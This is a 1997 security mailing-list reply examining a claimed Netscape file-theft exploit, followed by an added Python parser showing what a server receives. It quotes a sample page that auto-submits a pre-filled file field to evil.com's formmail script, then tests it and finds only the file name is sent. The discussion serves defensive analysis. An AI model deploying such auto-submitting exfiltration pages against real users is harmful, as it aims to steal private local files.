Re: Netscape Exploit

Roger Espel Llima (espel@LLAIC.UNIV-BPCLERMONT.FR)
Sun, 15 Jun 1997 00:16:45 +0200

On Sat, Jun 14, 1997 at 07:21:30PM -0500, root wrote:
> Here is a sample it isn't complete but you get the basic idea of what is
> going on

> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE></HEAD>
>
> <BODY onLoad="daForm.submit()">

That should be "document.daForm.submit()".

> <FORM
> NAME="daForm"
> ACTION="http://evil.com/cgi-bin/formmail.pl"
> METHOD=POST>
>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">

It doesn't seem to be this simple; with this fragment, Netscape never
sends the file's contents, but only the words "Save this document in
your hard drive" as well as the selected file's name, all in an
url-encoded POST request. The file's contents aren't sent at all.

I tried to do something similar, with inputs of type "file" and given
default "value" values, and Netscape (3.01) has been consistently
ignoring them.

Here's what the server gets, with this:

POST / HTTP/1.0
Referer: file:/path/to/attempted/exploit.html
Connection: Keep-Alive
User-Agent: Mozilla/3.01 (X11; I; SunOS 4.1.3_U1 sun4m)
Host: localhost:7777
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-type: application/x-www-form-urlencoded
Content-length: 72

Save+This+Document+on+your%0AHarddrive=&recipient=foo@bar.org

Adding the attribute ENCTYPE="multipart/form-data" doesn't seem to
help, either; it just changes the format. I haven't had any luck either
with changing the value of document.daForm.save_this_... from
javascript.

RFC 1867 about the form-based file upload in HTML has these security
considerations:

| 8. Security Considerations
|
| It is important that a user agent not send any file that the user has
| not explicitly asked to be sent. Thus, HTML interpreting agents are
| expected to confirm any default file names that might be suggested
| with <INPUT TYPE=file VALUE="yyyy">. Never have any hidden fields be
| able to specify any file.

and Netscape Navigator (3.01) seems to follow them... I'm willing to
believe that there's a bug somewhere around there, but it's not that
simple.

Roger

--
e-mail: espel@llaic.univ-bpclermont.fr, espel@unix.bigots.org
WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html
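An added illustration, not part of the thread above, of what a receiving CGI sees in both encodings discussed: the url-encoded body captured in the message (reused as constructed sample input) and a constructed multipart/form-data submission of the same form, where a pre-filled VALUE yields a file name but no contents. The small RFC 1867 parser and the `received_files` check are written here for the example; they are not Netscape's or formmail.pl's code.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the url-encoded body from the captured POST above.
URLENCODED_BODY = "Save+This+Document+on+your%0AHarddrive=&recipient=foo@bar.org"

# Constructed sample: the same form sent as multipart/form-data. The file
# part carries only the suggested file name; the content between the blank
# line and the next boundary is empty, because the user never chose a file.
BOUNDARY = "---------------------------7d1a2b3c"
MULTIPART_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="Save This Document on your Harddrive"; '
    'filename="c:\\config.sys"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "\r\n"
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="recipient"\r\n'
    "\r\n"
    "foo@bar.org\r\n"
    "--" + BOUNDARY + "--\r\n"
)

_DISP_PARAM = re.compile(r'(\w+)="([^"]*)"')


def parse_urlencoded(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def parse_multipart(body: str, boundary: str) -> list:
    """Split a multipart/form-data body (RFC 1867) into parts with
    name, filename (None for plain fields) and raw content."""
    parts = []
    for chunk in body.split("--" + boundary)[1:]:
        if chunk.startswith("--"):          # closing delimiter reached
            break
        head, _, content = chunk.lstrip("\r\n").partition("\r\n\r\n")
        if content.endswith("\r\n"):        # CRLF that precedes the next boundary
            content = content[:-2]
        disposition = {}
        for line in head.split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                disposition = dict(_DISP_PARAM.findall(line))
        parts.append({"name": disposition.get("name"),
                      "filename": disposition.get("filename"),
                      "content": content})
    return parts


def received_files(parts: list) -> list:
    """Only parts that actually carry content count as uploads; a file name
    alone (all a pre-filled VALUE produces) must not be acted on."""
    return [p for p in parts if p["filename"] is not None and p["content"]]
```
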